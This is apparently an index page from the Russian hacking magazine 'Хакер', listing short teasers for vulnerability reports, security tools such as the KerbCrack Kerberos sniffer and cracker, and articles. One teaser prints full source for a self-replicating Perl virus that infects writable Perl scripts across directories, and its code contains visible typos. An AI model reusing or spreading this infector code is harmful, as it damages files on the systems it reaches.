Уязвимость в FTP-клиентах
Многие FTP клиенты, включая те, которые встроены в Web клиенты, могут быть уязвимы к некоторым методам обхода каталога, кото…
Уязвимость в python
Уязвимость, обнаруженная в python от Zack Weinberg, связанна с неправильным использованием временных имен файлов в методе …
PortsLock 1.0
Уникальный файрвол, встраиваемый в Windows NT/2000/XP и позволяющий раздавать права пользователям на TCP/IP соединения. PortsLock позволяет определить, кто из пользователей достоин пользоваться HTTP, FTP, SMTP, POP3, Telnet и т.п., в какие дни и часы, с какими IP адресами может общаться и т.д
KerbCrack
KerbCrack состоит из двух программ: первая это сниффер слушающий сеть и перехватывающий Windows 2000/XP Kerberos логины, вторая - расшифровщик перехваченного, брутфорсом или по словарю.
mp3DirectCut 1.28
Маленькая утилитка для обработки МР3 файлов. Позволяет редактировать их прямо "на лету", вырезя из потока или СD песни только необходимые фрагменты.
DoS против Apple MacOS X
Mac OS X - BSD подобная операционная система от Apple Sofware.
Переполнение буфера в Enceladus Server Suite
Enceladus Server Suite - Web/FTP сервер для Windows, позволяющий безопасно организовывать общий доступ к файлам в сети. …
Переполнение буфера в PC-cillin
PC-cillin позволяет просматривать входящую электронную почту на наличие вирусов. Это достигается подключением локального поч…
Доступ к произвольному трафику в Netfilter/IPTables
Уязвимость в Netfilter/IPTables позволяет непривилегированному пользователю при определенных обстоятельствах читать ограниче…
Доступ к произвольным файлам в WebReflex
WebReflex - web-server, специально разработанный для использования на CD-ROM. Обнаруженная уязвимость позволяет удаленному а…
Неавторизованный доступ в APBoard
Уязвимость в APBoard позволяет неавторизованному пользователю читать сообщения внутреннего форума. Уязвимость связанна с нед…
Повышение привилегий
Повышение привилегий в системе - вечная тема для обсуждений. Сколько эксплоитов было сделано, сколько rootkit'ов было написано, и ради чего? Кодить, кодить, кодить... Дни и ночи напролет... Каждый пытается найти уязвимость, получить права рута, получить ВСЕ! Я не понимаю откуда берется это желание
DNS Hijacker
Программа, основанная на libnet/libpcap, которая может использоваться как сниффер или спуфер, а так же просто для учета трафика сети.
Уязвимость прокси в InterScan VirusWall
Встроенный в TrendMicro InterScan VirusWall прокси сервер позволяет коннектится к любому хосту внутри сети.
Локальный root в Exim (pid_file_path)
Уязвимость в Exim позволяет выполнять любые команды на сервере. Ошибку можно обнаружить в исходниках daemon.c:
ZoneAlarm Pro v3.5.166
Новая версия ZoneAlarm Pro v3.
Эксплоит для Cobalt RaQ4
Эксплоит позволяет получить root-привилегии на системе Cobalt RaQ 4 с установленным Security Hardening Рackage (SHP).
Множественные уязвимости в Ultimate PHP Board
Ultimate PHP Board - небольшой форум, написанный на PHP.
Межсайтовый скриптинг в SquirrelMail
SquirrelMail - webmail программа для Linux и Unix систем.
Межсайтовый скриптинг в разрешенных тэгах в phpBB2
phpBB - доска объявлений для UNIX и Windows систем.
SniffDet
Программа для анализа TCP/ IP сети с целью обнаружения сниффера.
Межсайтовый скриптинг в phpBB
phpBB - популярная доска объявлений для UNIX и Windows систем. Из-за недостаточной фильтрации ввода пользователя, удаленный …
Удаленное переполнение буфера в Cyrus IMAP Server
Cyrus IMAPD - бесплатный, с открытым исходным кодом IMAP демон для LINUX и UNIX систем. Пользователь, подключенный к демону,…
Несколько переполнений буфера в Cyrus Sieve/libSieve
В Sieve библиотеке в Cyrus IMAP сервере обнаружено несколько опасных уязвимостей: Передавая заголовок чрезмерной длин…
DoS и утечка информации в Apache/Tomcat
Jakarta Project создает и поддерживает открытые решения на Java платформе для последующего бесплатного распространения. Tomc…
Ставим и настраиваем IRC сервисы
Сегодня мы поговорим о настройке IRC-сервисов, причем эта тема будет освещаться со стороны администратора, то есть тебя =). Будучи юзером в IRC, ты быть может уже знаком с сервисами и знаешь почти все их команды, но, поверь, админом быть гораздо интереснее =)
Раскрытие информации о точке доступа в Windows XP
Обнаруженная уязвимость позволяет раскрыть список значений SSID, назначенных зарегистрированным точкам доступа и пакеты, заш…
Эксплоит WinSSLMiM
WinSSLMiM - эксплоит, реализующий нападение HTTPS "Man in the Middle". Программа содержит FakeCert, утилиту для со…
Патч для IE 5.5 и 6.0
Выпущена очередная заплата к Internet Explorer 5.5 и 6.0, которая содержит все предыдущие исправления к Internet Explorer и …
DoS против Outlook 2002
При работе с полученными почтовыми сообщениями Outlook обрабатывает информацию, содержащуюся в почтовом заголовке, которая с…
WifiScanner
Программа для обнаружения и анализа 802.
Вирус на Perl №2
В следующем исходнике дано решение данной проблемы: #!/usr/bin/perl # Perl - Get'em'all Virus open(File,$0); @Virus=<File>; @Virus=@Virus[0...46]; close(File); &InfectFile; if ($^0 =~ "MacOS") { chdir('::'); &InfectFile; } else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd`; chdir('..'); &InfectFile; chdir('C:\'); &SearchUpperDirectorys; chdir($OldDir);} else { $OldDir = `pwd`; chdir("/"); &SearchUpperDirectorys; chdir($OldDir);}} sub InfectFile { foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); }}}}} sub SearchUpperDirectorys { foreach $Directory (<*>) { if ((-r $Directory) && (-w &Directory ) && (-d $Directory) { chdir ($Directory); &InfectFile; chdir ('..') }}} OK, если мы в системе MacOS, то заражаем лишь низшую директорию
IDS: классификация
Здравствуйте, уважаемые! Сегодня мы поговорим о системах обнаружения вторжений. Итак IDS (Intrusion Detection Systems). Все, кого не спроси о том, что нужно для обеспечения хорошего уровня безопасности своего компа или локальной сети в один голос скажут - хороший, грамотно настроенный файрволл + антивирусная система
Недостаток в FUS механизме в Windows XP
Microsoft Windows XP содержит особенность, которая называется Fast User Switching (FUS). Эта особенность позволяет нескольки…
Ракрытие информации в SuidPerl
Suidperl - perl интерпретатор для suid perl сценариев, часть пакета perl. Уязвимость, обнаруженная в SuidPerl, позволяет ата…
Обход ограничений зоны безопасности в Internet Explorer 6.0
Сценарий может обратиться к данным других доменов, в том числе и к "Local computer zone", когда назначается стиль текст…
Переполнение буфера в Netscape 4
Реализация Java в Netscape 4 содержит переполнение буфера в методе sun.awt.windows. WDefaultFontCharset. canConvert(). Уязви…
Переполнение буфера в Windows клиенте SSH
Переполнение буфера обнаружено в Windows клиенте SSH. Уязвимость происходит из-за ошибки в URL обработчике в Secure Shell кл…
Переполнение буфера в Samba
Переполнение буфера обнаружено в подпрограмме изменения пароля в Samba. Из-за недостаточной проверки границ пользовательског…
Вирус на Perl
Единственная цель этой статьи - получение дополнительных знаний, которые помогут начинающим программистам (таким как я :-)) в освоении языка Perl. Код, использованный здесь, является достаточно простым для понимания теми, кто уже имеет базисные знания Perl
Бумажный спецвыпуск
«ХАКЕР» ДОСТУПЕН ТОЛЬКО В ЭЛЕКТРОННОЙ ВЕРСИИ
Оформи подписку — получи:
- доступ к платным материалам сайта
- доступ ко всем номерам PDF
4500 р.
на год
на год
450 р.
на месяц
на месяц
Материалы для подписчиков
Вопросы по материалам и подписке: support@glc.ru
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —
самой забойной защитой от DDoS в мире
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —самой забойной защитой от DDoS в мире